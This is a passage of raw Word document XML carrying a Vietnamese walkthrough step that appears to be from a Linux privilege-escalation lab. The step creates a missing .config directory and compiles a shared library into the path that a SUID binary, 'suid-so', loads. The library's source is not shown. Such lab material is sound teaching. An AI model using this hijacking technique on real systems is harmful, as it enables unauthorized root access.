          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cố</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gắng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tải</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đối</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tượng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/home/user/.config/libcalc.so</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chia</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẻ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thư</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mục</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chính</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">chúng </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ta, nhưng không thể tìm thấy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3922F0EE" w14:textId="5DB0C847" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="85" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.config </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho tệp libcalc.so:</w:t>
      </w:r>
      <w:r w:rsidR="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00052672" w:rsidRPr="00052672">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>mkdir /home/user/.config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C81AED5" w14:textId="59F18AA9" w:rsidR="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="60" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="303"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Biên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dịch</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mã</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thành</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>một</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đối</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tượng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chia</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẻ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vị</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trí</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mà</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>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w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>suid-so</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đang</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tìm</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kiếm</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2261536F" w14:textId="08CF8C40" w:rsidR="00052672" w:rsidRPr="00052672" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="78" w:after="60" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="303"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>gcc /home/user/tools/suid/libcalc.c -shared -fPIC -o /home/user/.config/libcalc.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661CE915" w14:textId="1E080135" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="164" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E26C44F" w14:textId="2D3AEC38" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="00052672" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="108"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725824" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A1A4977" wp14:editId="598CED8F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>589915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1562100" cy="419100"/>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419100"/>
                          <a:chOff x="1440" y="183"/>
                          <a:chExt cx="1588" cy="165"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="129" name="Freeform 235"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="183"/>
                            <a:ext cx="1588" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3001 1440"/>
                              <a:gd name="T1" fmla="*/ T0 w 1588"/>
                              <a:gd name="T2" fmla="+- 0 348 183"/>
                              <a:gd name="T3" fmla="*/ 348 h 165"/>
                              <a:gd name="T4" fmla="+- 0 1467 1440"/>
                              <a:gd name="T5" fmla="*/ T4 w 1588"/>
                              <a:gd name="T6" fmla="+- 0 348 183"/>
                              <a:gd name="T7" fmla="*/ 348 h 165"/>
                              <a:gd name="T8" fmla="+- 0 1463 1440"/>
                              <a:gd name="T9" fmla="*/ T8 w 1588"/>
                              <a:gd name="T10" fmla="+- 0 347 183"/>
                              <a:gd name="T11" fmla="*/ 347 h 165"/>
                              <a:gd name="T12" fmla="+- 0 1440 1440"/>
                              <a:gd name="T13" fmla="*/ T12 w 1588"/>
                              <a:gd name="T14" fmla="+- 0 321 183"/>
                              <a:gd name="T15" fmla="*/ 321 h 165"/>
                              <a:gd name="T16" fmla="+- 0 1440 1440"/>
                              <a:gd name="T17" fmla="*/ T16 w 1588"/>
                              <a:gd name="T18" fmla="+- 0 210 183"/>
                              <a:gd name="T19" fmla="*/ 210 h 165"/>
                              <a:gd name="T20" fmla="+- 0 1467 1440"/>
                              <a:gd name="T21" fmla="*/ T20 w 1588"/>
                              <a:gd name="T22" fmla="+- 0 183 183"/>
                              <a:gd name="T23" fmla="*/ 183 h 165"/>
                              <a:gd name="T24" fmla="+- 0 3001 1440"/>
                              <a:gd name="T25" fmla="*/ T24 w 1588"/>
                              <a:gd name="T26" fmla="+- 0 183 183"/>
                              <a:gd name="T27" fmla="*/ 183 h 165"/>
                              <a:gd name="T28" fmla="+- 0 3028 1440"/>
                              <a:gd name="T29" fmla="*/ T28 w 1588"/>
                              <a:gd name="T30" fmla="+- 0 210 183"/>
                              <a:gd name="T31" fmla="*/ 210 h 165"/>
                              <a:gd name="T32" fmla="+- 0 3028 1440"/>
                              <a:gd name="T33" fmla="*/ T32 w 1588"/>
                              <a:gd name="T34" fmla="+- 0 321 183"/>
                              <a:gd name="T35" fmla="*/ 321 h 165"/>
                              <a:gd name="T36" fmla="+- 0 3005 1440"/>
                              <a:gd name="T37" fmla="*/ T36 w 1588"/>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8" h="165">
                                <a:moveTo>
                                  <a:pt x="1561" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1561" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1588" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1588" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1565"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236"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="183"/>
                            <a:ext cx="158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20D9" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00052672" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
